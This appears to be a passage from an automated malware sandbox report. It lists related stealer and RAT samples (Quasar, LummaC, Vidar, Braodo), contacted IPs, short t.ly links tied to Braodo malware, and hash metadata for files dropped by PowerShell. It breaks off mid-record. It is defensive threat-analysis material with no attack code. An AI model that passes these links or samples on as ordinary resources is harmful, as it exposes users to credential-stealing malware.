                                                                                                                                                                                          • 162.125.66.18
                                                                                                                                                                                          5nNxM6CCh5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                          • 162.125.66.18
                                                                                                                                                                                          Order88983273293729387293828PDF.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                          • 162.125.66.18
                                                                                                                                                                                          XoZ8DeZQxR.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                          • 162.125.66.18
                                                                                                                                                                                          5nNxM6CCh5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                          • 162.125.66.18
                                                                                                                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                          • 162.125.66.18
                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                          • 162.125.66.18
                                                                                                                                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                          • 162.125.66.18
                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                          C:\Users\Public\Document\Lib\email\_encoded_words.pyhttps://t.ly/-kxCOGet hashmaliciousBraodoBrowse
                                                                                                                                                                                            new.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              x.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                https://t.ly/SjDNXGet hashmaliciousPython Stealer, BraodoBrowse
                                                                                                                                                                                                  new.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    https://t.ly/D5x5UGet hashmaliciousBraodoBrowse
                                                                                                                                                                                                      BB.batGet hashmaliciousBraodoBrowse
                                                                                                                                                                                                        AutoRun.batGet hashmaliciousBraodoBrowse
                                                                                                                                                                                                          leo.batGet hashmaliciousBraodoBrowse
                                                                                                                                                                                                            cat.batGet hashmaliciousBraodoBrowse
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):68971076
                                                                                                                                                                                                              Entropy (8bit):7.994095560355391
                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                              SSDEEP:1572864:T20csalWaQNbExc9vRC6Ny/sWB5rsLfIxrsRf:6galmJrnUnB5rsLfIruf
                                                                                                                                                                                                              MD5:1D97414326053DE55BBD1BEA666BD145
                                                                                                                                                                                                              SHA1:9F3D2FBAE467F23372E4D3B9EB7DF4414912BEE5
                                                                                                                                                                                                              SHA-256:D5262F870BD730E178F3431205C15D43F3C2ACBD0546B5D8788DDEC53B8B14D1
                                                                                                                                                                                                              SHA-512:16E56694A03DE005C21C3A3DC3B71C85612CD8D1D761BB6E7384ADB51960726DA6D5038149CEFDB825D3083CDA54DA1E82D73557B92D6D029F70AB45A431B1BA
                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              Preview:PK........\.FX....G'..........LICENSE.txt.\]s..}G...J/....L2.Im...m.-y))..KI...Eh.........Yv..W.*U.D..F..}N.t/.W.x2.?....\.|<..|.......<v.+V*..D.y..B,..x..\$y.....O5...e)...'.....'...r.*dv....B....EV.p.Q.S.s-._..F....v...[.d..g(.=O.l.=.j$\...Z.\-.+.tW&w..4..z...[}r.Sf..a....\fs.IR..p-.y...........Bh.N...+.S..B*....+TF.h.(...mWx..JP`%5........8...7*OP._..cC....B.A.6Q&..W.A...0>d.,.A.t...>.J}.10VLW|.Q.w2.....R..R.h.L.{.Co.iLj.zyL.e.Mr..v........X.ot.+...a..a2y!.5_.{.P.;....9..P8.5.6....d...L..8..j&r.......M|......,`H}.N.......31'..R...Mw0.nS2.[...Uf.3EG...2....P.@.w.7z...V..R,..x...M...NpK...H......1.K...!.........e..g..%..6.!...x8..5+b..W..w|-..3..hJ{ij.p.9...c..|..Q...L.u..q.b.n0.K...c0.....|..].......%.....U...{.?i.s.R/o.O.c60.Y*>..E....Tma..I....r._T....@9.bs...@...._......6...vnZ.h...U.....{..9....0.......CG....|.0X]......k...7%`;l...C.8..].3'.^....^.L..g..^.ZV.mc.Wm...x..=................(.t_...t....'.Y..y..A.6~.......(8'3...{.dj{
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13986
                                                                                                                                                                                                              Entropy (8bit):4.838813113905395
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:aKjZHqklFTECnpTMYiIc/+EWndTMa76zqWTC:DpqyFgCdMY+NWJMa762/
                                                                                                                                                                                                              MD5:DA723620139164CDA7B2D095E05F7AFB
                                                                                                                                                                                                              SHA1:E83AF2211E23A299DA9A5520A073F050697037D3
                                                                                                                                                                                                              SHA-256:F790C72762BD4F1391A0092917E16B6D50904E519E9D6AF11EEB2015926A2CF8
                                                                                                                                                                                                              SHA-512:14EA9B2A5D745483C26C1CBE28108CFC48D2AC4263C4195E8F892FA1454D601B2184FE6BC49ACD78AFCAAB313F9A952A77AB57E3663E29AF5A461546FA694FEC
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Porting Extension Modules to Python 3" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/howto/cporting.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="We recommend the following resources for porting extension modules to Python 3: The Migrating C extensions chapter from Supporting Python 3: An in-depth guide, a book on moving from Python 2 to Pyt..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="We recommend the following resources for por
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (635), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):68031
                                                                                                                                                                                                              Entropy (8bit):4.880878204341014
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:bqysM3hWfoI0XnU+Vw/yuCLiUfCO+Mn762/:ZQfRtQ8A
                                                                                                                                                                                                              MD5:F9D0AF2E989724ADD1F632AD3DBD599C
                                                                                                                                                                                                              SHA1:90EDB6D46FD5659D6C53E80669B68F7CD51DAB09
                                                                                                                                                                                                              SHA-256:6C37AA6E888FFB170ED63D7E557E9ED70540AFF0B58B1F556578154D25711DA1
                                                                                                                                                                                                              SHA-512:F5CD9DC6A08F4E2DC427F6E18A744EE4E4B921F600ACA11FDCC9A7BED29F20A0CF9864546AF45E86B9D0E420BC85574E659E29397B77076F6031EF723DDBD8E7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Curses Programming with Python" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/howto/curses.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Author, A.M. Kuchling, Eric S. Raymond,, Release, 2.04,. Abstract: This document describes how to use the curses extension module to control text-mode displays. What is curses?: The curses library ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Author, A.M. Kuchling, Eric S. Raymond,, Release, 2.0
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (612), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):171346
                                                                                                                                                                                                              Entropy (8bit):4.737436357858641
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:Fqy5MdK7jp/fCxOTpD2sbsVGB5HgAoffCl7CGyRKsZ2cQeLlHS3mr2YG1ll0++rK:WK7jpFb5Hx7lJCboKtb3A
                                                                                                                                                                                                              MD5:87563F71701C2FFBB8C01A551BA68CA5
                                                                                                                                                                                                              SHA1:4AC30F3AAA58565719398E39F409BCA3B2EDDA31
                                                                                                                                                                                                              SHA-256:51AFC08E96CF737CEA29DB7DA024273B702FC89112EAAD700DAAB8A3F3404036
                                                                                                                                                                                                              SHA-512:DF677A090F96215E9567B93FB4CA64B05C46C86E0FB6D92AF4D0162284977710F38DD386974A88B16F715424C026FBE1DBCC9D1C2AE56D9BD5D731BB832AE80F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Descriptor HowTo Guide" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/howto/descriptor.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Author, Raymond Hettinger,, Contact,<python at rcn dot com>,. Contents: Descriptor HowTo Guide- Primer- Simple example: A descriptor that returns a constant, Dynamic lookups, Managed attributes, Cu..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Author, Raymond Hettinger,, Contact,<python at rcn dot co
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (657), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):188521
                                                                                                                                                                                                              Entropy (8bit):4.838525480608339
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:RGxqyHMq2eu2bF/D/xpcQ/L2ZoVph7PMjDscBnZuLL/HeRCi1NMxxtiQz46I3EMY:uV9a3cVrLQ3RQdftaA
                                                                                                                                                                                                              MD5:6ADBDDB7F9BDDDFA7192CF4428E36856
                                                                                                                                                                                                              SHA1:7AE665382E8522FEF8D627CD5AF431927E01F79A
                                                                                                                                                                                                              SHA-256:80D848128EF5BF2C95E30D989BB7654F026F3B21DA39B6F0F8AEF795B3EB2D08
                                                                                                                                                                                                              SHA-512:52EB8E8E922A61E9201E0E30E3127AD9D40ED626928E7C7E0F1999A76AF0AA8AF5DE6878BC8CD62B75EFD701E09D42501964D4D6572F9636EB340FEB0F084A45
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Enum HOWTO" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/howto/enum.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="An Enum is a set of symbolic names bound to unique values. They are similar to global variables, but they offer a more useful repr(), grouping, type-safety, and a few other features. They are most ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="An Enum is a set of symbolic names bound to unique values. They are similar
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (866), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):168249
                                                                                                                                                                                                              Entropy (8bit):4.7746879903514206
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:5qybb9yMSkbLAMhDJAW4p4henyaipdMdGmitOJQCvzkuAH1Au1k1jmYwyoJJjkS4:Pb93DJt4p4z1m1Ts2VHb9eA
                                                                                                                                                                                                              MD5:29BFD5339EC7245ACE96327B17AA5AEB
                                                                                                                                                                                                              SHA1:67FF21C2AC3262F4DD76237C9742D002D1F1B607
                                                                                                                                                                                                              SHA-256:D63393231BC92D85DF66BDDC2BD0A913CD9AB3E11E51AEEAB3B616683771DAD4
                                                                                                                                                                                                              SHA-512:3A58202976255EBFD71083C93F7023A38948D9D6EEBE353D5E039FC1BD455039785661649D6C757182BF5C623E5C54C42DA198F3090CF6E951D9E9708E229A2D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Functional Programming HOWTO" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/howto/functional.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Author, A. M. Kuchling,, Release, 0.32,. In this document, we.ll take a tour of Python.s features suitable for implementing programs in a functional style. After an introduction to the concepts of ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Author, A. M. Kuchling,, Release, 0.32,. In thi
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):15224
                                                                                                                                                                                                              Entropy (8bit):4.865079593055573
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:3+6+0HqkldXjn/TM0+21i1nbTMe76zqWTC:Oz4qydT7MR00/Me762/
                                                                                                                                                                                                              MD5:764F38235EEB9824BDBA3796A73CBE6E
                                                                                                                                                                                                              SHA1:C85B4ECB699F813B029D009230D9894F5C218DD4
                                                                                                                                                                                                              SHA-256:1AE442B1D383539068B7ECA859F72251EEA6F3B1F3C13FE4691C925E1ACBA73D
                                                                                                                                                                                                              SHA-512:6151B27C9A6C6A72B3149515817520DF0BD2E3764AEA6879B479F858D15879217A5776B7AA39755E889AEC27A7C28CCDA35238FA5BAE8E78816A1B1E8E2AB708
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Python HOWTOs" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/howto/index.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Python HOWTOs are documents that cover a single, specific topic, and attempt to cover it fairly completely. Modelled on the Linux Documentation Project.s HOWTO collection, this collection is an eff..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Python HOWTOs are documents that cover a single, specific topic, and
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (419), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):41209
                                                                                                                                                                                                              Entropy (8bit):5.038442539689365
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:WkVqys3ZMIP/xvkpAJEbziroly2X0Y9FVSZXUmIn4+umHiI78hsZ8VM5762/:xqy+MI3FkpAJEbzKolX9FVSZkmIn4+uw
                                                                                                                                                                                                              MD5:B0D0E26F1FE090AF0C287B3F97F898E1
                                                                                                                                                                                                              SHA1:8826FEF4C71F035E2BA54B25B1E1C4E8D2FA6ACF
                                                                                                                                                                                                              SHA-256:77C011F1D7CD40FB478294B05CE831ABF034D581C046D4FD4C2005EA110B517A
                                                                                                                                                                                                              SHA-512:B3C2676FF1088D5504F3D61FEEA507E952025FE9DA934BB936B045BB8447689ABF70BE453397D0EF6CC9295FFA670CB8D7928AB8E90F33792DE86D9E4DDA1C08
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Instrumenting CPython with DTrace and SystemTap" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/howto/instrumentation.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="author, David Malcolm,, author, .ukasz Langa,. DTrace and SystemTap are monitoring tools, each providing a way to inspect what the processes on a computer system are doing. They both use domain-spe..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="author, David Malcolm,, au
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (510), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):46625
                                                                                                                                                                                                              Entropy (8bit):4.983679810829745
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:FR5qyCpGM9VdpU9Cn10PdhfhLXLkRth7kskTilo1S0MF762/:RqyfM97pU9Cn10PdhfpXLOth7kskT+o8
                                                                                                                                                                                                              MD5:987AB1FB0E76E96BD75CEB0E987A0B1C
                                                                                                                                                                                                              SHA1:09C1B8E84BC9D92F16C68BCAEA2C0D1D55201AA5
                                                                                                                                                                                                              SHA-256:6C048FE6E07DED574E46E027654628E962C0731E3D2E99FA639834AE278AC94A
                                                                                                                                                                                                              SHA-512:F83F92BC8D500EF2F6D866A25ED37D03DB1D608ACB511310524934A9E94E0A9CF32AF9F91FB4070AE97DBF90E1DABD68EC4688C49442B9AA83A3CE5660076552
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="An introduction to the ipaddress module" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/howto/ipaddress.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="author, Peter Moody,, author, Nick Coghlan,. Overview: This document aims to provide a gentle introduction to the ipaddress module. It is aimed primarily at users that aren.t already familiar with ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="author, Peter Moody,, author, Nick Cogh
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (653), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):77143
                                                                                                                                                                                                              Entropy (8bit):4.910653389649389
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:/RqytRn0M+eQFlbsdwKOWP1PdaT/8zDZHUhkxHZRYcMt762/:/5RnuHlwdNfVVhZRY4A
                                                                                                                                                                                                              MD5:9A7FE61B340ED921B2FD41B82ABAF539
                                                                                                                                                                                                              SHA1:286FEA74902593289C7AC1BD0E96D7032E6731DB
                                                                                                                                                                                                              SHA-256:70B2712D5362C053DFB9DF5C965933A04598863401BF3CA5083703738E4B727A
                                                                                                                                                                                                              SHA-512:C3CA7D74E8B0C1CE591524C8F7AD7D0B77D839EF08A22159E4A8029C297A0297907C480C37DFD0017F40FE01E0735B545FEBD7C992A72025FA175BB123D28EC6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Isolating Extension Modules" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/howto/isolating-extensions.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Abstract: Traditionally, state belonging to Python extension modules was kept in C static variables, which have process-wide scope. This document describes problems of such per-process state and sh..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Abstract: Traditionally, state belonging t
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (578), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):492727
                                                                                                                                                                                                              Entropy (8bit):4.722854178823255
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6144:FZFuF5nDg0B4g7rY7rKUvlfijytnBgJ3lJOpA:PFuFNg7bgJoA
                                                                                                                                                                                                              MD5:2703275076A009639B62885014552D02
                                                                                                                                                                                                              SHA1:90A812F8EC591412C221E309E2710904538C50A4
                                                                                                                                                                                                              SHA-256:1D8090CD384144F3A83EB744954968E34287A2EAE32C391B1BF55E91B0190810
                                                                                                                                                                                                              SHA-512:40299D55AD2FC0A888048D1F7763985AAE7294DDC0CDCEBA334C31FCBE00689419CD6C6957862970C270C74DA27B8E90C3813D704A2B90866BA2EC718DEC23BC
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Logging Cookbook" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/howto/logging-cookbook.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Author, Vinay Sajip <vinay_sajip at red-dove dot com>,. This page contains a number of recipes related to logging, which have been found useful in the past. For links to tutorial and reference info..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Author, Vinay Sajip <vinay_sajip at red-dove dot com>,. T
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (915), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):128935
                                                                                                                                                                                                              Entropy (8bit):4.876620343168328
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:rgSYE64qiy21LuuyUJacnkkHK08lOybocsKPP+A:zy4uuWReA
                                                                                                                                                                                                              MD5:C0652F97953924404AD91E283BF84A4F
                                                                                                                                                                                                              SHA1:B3AB7983FEF3C5D87B2536689BFC361FFA266DD9
                                                                                                                                                                                                              SHA-256:F219F215BF5D5E74B964E754B5924C6A52D07D66CFBB0283987DF35719160AF0
                                                                                                                                                                                                              SHA-512:E76866BFECDF23B71C84E83F60B91DC81728F7728B4428B6AD80930E546CF16F7D794E92DFB255C67E5077A928C998A5CDBF8E0FEFA9C365D19F6365B0598EAB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Logging HOWTO" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/howto/logging.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Author, Vinay Sajip <vinay_sajip at red-dove dot com>,. This page contains tutorial information. For links to reference information and a logging cookbook, please see Other resources. Basic Logging..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Author, Vinay Sajip <vinay_sajip at red-dove dot com>,. This page con
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (378), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):33147
                                                                                                                                                                                                              Entropy (8bit):4.699960828706289
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:c6pqyNUkMQWfjiovUWmgaTVez8v633yMa762/:zqyBMQ8JUWbahez8v6yMa762/
                                                                                                                                                                                                              MD5:02CAF4761A9C220251CB5639915AD645
                                                                                                                                                                                                              SHA1:AAFA50C623DF487115596C79981F2C7667CEFF68
                                                                                                                                                                                                              SHA-256:A470A2F7577DCA7E878CDAF5E5AFB3448B2B087A6E3A4F5BFC6715B990C47638
                                                                                                                                                                                                              SHA-512:4DA42042BF2B935D9CABB773EB15B0DD498A24ABC9CEBA67233AF6DC404D2CC3E791F747ECC64FB47F9DD7C3DDAB3D387395C0316A2CB8128D5411E97F53D8C5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Python support for the Linux perf profiler" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/howto/perf_profiling.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="author, Pablo Galindo,. The Linux perf profiler is a very powerful tool that allows you to profile and obtain information about the performance of your application. perf also has a very vibrant eco..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="author, Pablo Galindo,. The Linux
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (452), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):53517
                                                                                                                                                                                                              Entropy (8bit):4.84741719741744
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:AqyFxMKm8WSZe3mve/kSbdQNEzYMQ762/:Mnm8Wz2ve/5zXA
                                                                                                                                                                                                              MD5:681E5287A4C572469C5743A3FF199115
                                                                                                                                                                                                              SHA1:CD3294068BF082419BAFEB5C9C341DC91C50FCB6
                                                                                                                                                                                                              SHA-256:E95A12C32EC02949DF6D93A6A52E10A437966D1FC9B0CE0619911C0B111BB5B6
                                                                                                                                                                                                              SHA-512:81FE4A790FF2C11E0700FD595423BB3E50384D604592E8994F37A3008F9528E5F5F70481C6BF88422A2F8DC1432B7863000B8BA109D2004284BABA8A47ACF347
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="How to port Python 2 Code to Python 3" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/howto/pyporting.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="author, Brett Cannon,. Abstract: Python 2 reached its official end-of-life at the start of 2020. This means that no new bug reports, fixes, or changes will be made to Python 2 - it.s no longer supp..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="author, Brett Cannon,. Abstract: Python 2
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (591), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):167032
                                                                                                                                                                                                              Entropy (8bit):4.8897511322935605
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:xqyCOMJaKUMus4E3b8Ov4IpVj7broYNYcXptTbEIZJurIlGwIcu2IhhMIM4vIJsk:oaKUi4lTIOATMsvoE0CPgiI/qoS4A
                                                                                                                                                                                                              MD5:EC6D405926B67AFDC71F3CB5DF6A9F0C
                                                                                                                                                                                                              SHA1:97C41938E5E0D32E3D340A72D4EA3BCA43A49B9A
                                                                                                                                                                                                              SHA-256:3994FE48FE1281A508A23736A045DAB2C6072FE94B6A2E787DD1CF70224C12DA
